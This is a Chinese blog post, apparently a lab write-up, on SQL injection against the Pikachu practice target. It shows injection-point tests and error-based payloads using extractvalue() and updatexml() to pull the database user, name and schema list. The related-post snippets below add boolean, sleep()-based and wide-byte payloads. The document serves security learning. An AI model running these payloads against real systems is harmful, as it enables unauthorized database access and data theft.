sql注入之pikachu盲注练习

已于 2022-05-21 16:08:44 修改
阅读量777 收藏
点赞数
分类专栏: 渗透测试之注入攻击 文章标签: sql 数据库 mysql
于 2022-05-21 15:50:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windStudyer/article/details/124899190
版权

实验环境:

Phpstudy + Pikachu + mysql + apche

实验目标:通过报错注入获取数据库的相关信息,解决无回显的场景获取数据库信息

  1. 判断是否存在注入

正常输入的abc查看结果,它说输入的username不存在,这是正常返回的情况

接下来再验证它是否不正常的情况会是怎样?这个地方可以猜测出如果存在注入,在数据库里执行的的查询语句,查询语句可能包含条件模糊查询,而且是字符类型。那么就想办法构造的语句让它不能执行。

传统方法

尝试方法1:abc ‘ and 1=1 然后与正常的情况对比,如果和使用abc 参数不一至 说明有注入.自己想想why??
尝试方法2:abc ‘ and 1=2 然后与正常的情况对比,如果和使用abc 参数一至 说明没有注入.自己想想why??

注:这里为什么是 abc ‘ and ‘1’=’1 而不是abc and 1=1,因为这里参数是字符型,要构造’符合的闭合,传入的参数,在数据库中实际sql执行的语句应该是 select * from tables where username=’传入的参数’。自己想想??

最快的方法:我喜欢直接输入:’或者”或者% 闭合符号,想想为什么??.既然是构造语句,又是字符类型,最直接的就是构造错误,让它执行出错。这里闭合的符号不一定是’,也有可能是“等其它,需要看实际情况。

代码审计:

从源码来分析,并没有对参数进行任务处理。直接接收参数,构造sql语句带入到数据库执行。

  1. 猜解数据库名、表名、列名、数据详细信息

从上已经判断出有注入点了。这里为了练习学习,mysql5.0以上的版本是有一张默认表的,这里采用报错注入的方式获取数据库的信息。

2.1猜解数据库名

2.1.2报错盲注猜解

2.1.2.1XPATH报错注入猜解

  1. 条件:mysql5.1及以上版本
  2. 报错函数

(2.1)extractvalue(arg1,arg2) 接受两个参数,arg1:XML文档,arg2:XPATH语句

标准payload:and extractvalue(1,concat(0x7e,(select user()),0x7e))

Eg:select * from users where username='aa' or extractvalue(1,concat(0x7e,(select user()),0x7e)) and id=2;

2.2updatexml(arg1,arg2,arg3)

arg1为xml文档对象的名称,arg2为xpath格式的字符串;arg3为string格式替换查找到的符合条

标准payload:and updatexml(1,concat(0x7e,(select user()),0x7e),1)

Eg:select * from users where username='aa' or updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),64,32),0x7e),2) and id=2;

注意:XPATH报错注入的使用条件是数据库版本符合条件;extractvalue()和updatexml()有32位长度限制。

解决办法:用substr()函数截取前后部分 例如:

and extractvalue(1,concat(0x7e,substr((select database()),1,5))) %23

最低0.47元/天 解锁文章
fzsecurity
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-Pikachu靶场通关_pikachu靶场通关sql,重磅消息
m0_61369275的博客
04-06 879
(备注网络安全获取)**[外链图片转存中…(img-O4zNM2Lc-1712348724676)]
pikachu SQL 注入(盲注
weixin_60508121的博客
04-19 3656
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
[Pikachu靶场实战系列] SQL注入盲注
00勇士王子的博客
07-29 3017
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
基于Pikachu测试平台的SQL注入-盲注
qq_43499389的博客
03-19 1116
什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错 此事无法再根据报错信息来进行注入的判断。这种情况下的注入,就是盲注 根据表现形式的不同,盲注又分为based boolean(基于真假)和based time(基于时间)两种类型。 基于boolean的盲注主要表现症状 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或1) 3.在正...
sql盲注练习
SUSUYUA的博客
02-19 194
sql盲注分为基于布尔的盲注以及基于时间的盲注。本篇文章是在sqli环境下对于sql盲注的联系实战
pikachu平台SQL注入
m0_46684679的博客
12-01 925
pikachu平台SQL部分速通
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
pikachu漏洞练习环境
10-25
pikachu漏洞练习环境,直接放在apache中的www目录下即可,如遇到不会安装可留言或者私信我。
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
sql盲注、头注与爆破练习
0xcc'Blog
04-08 347
SQL头注入
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6475
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu盲注(base on time)
weixin_50339082的博客
06-14 992
pikachu盲注(base on time) 打开pikachu测试平台。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具(F12),控制台,选择网络。 输入 kobe’ and sleep(5)#,发现延迟5秒发送。 输入错误信息,发现sleep语句不执行 这样我们就可以写一个判断 kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)# 输入 kobe’ and if((subst
pikachu盲注(base on boolian)
weixin_50339082的博客
06-15 1241
pikachu盲注(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4812
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 752
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入。
Pikachu-Sql Inject
baynk的博客
11-19 1016
0x00 Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后...
pikachu 盲注
最新发布
08-25
"PIKACHU"盲注是指基于时间或布尔值的盲注技术。盲注是一种注入攻击技术,没有页面回显来判断是否存在注入。基于时间的盲注是指攻击者通过在注入语句中添加延时函数来检测注入的结果是否延时。基于布尔值的盲注是指攻击者通过在注入语句中使用布尔表达式来检测注入的结果是否为真或假。这些方法都需要攻击者进行多次尝试来猜解列名和数据,虽然可行但比较繁琐。 需要注意的是,在insert、update、delete等操作中,是不能使用union进行联合查询的,因为这些操作不是查询操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PIKACHU--SQL注入](https://blog.csdn.net/weixin_50688050/article/details/116720320)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值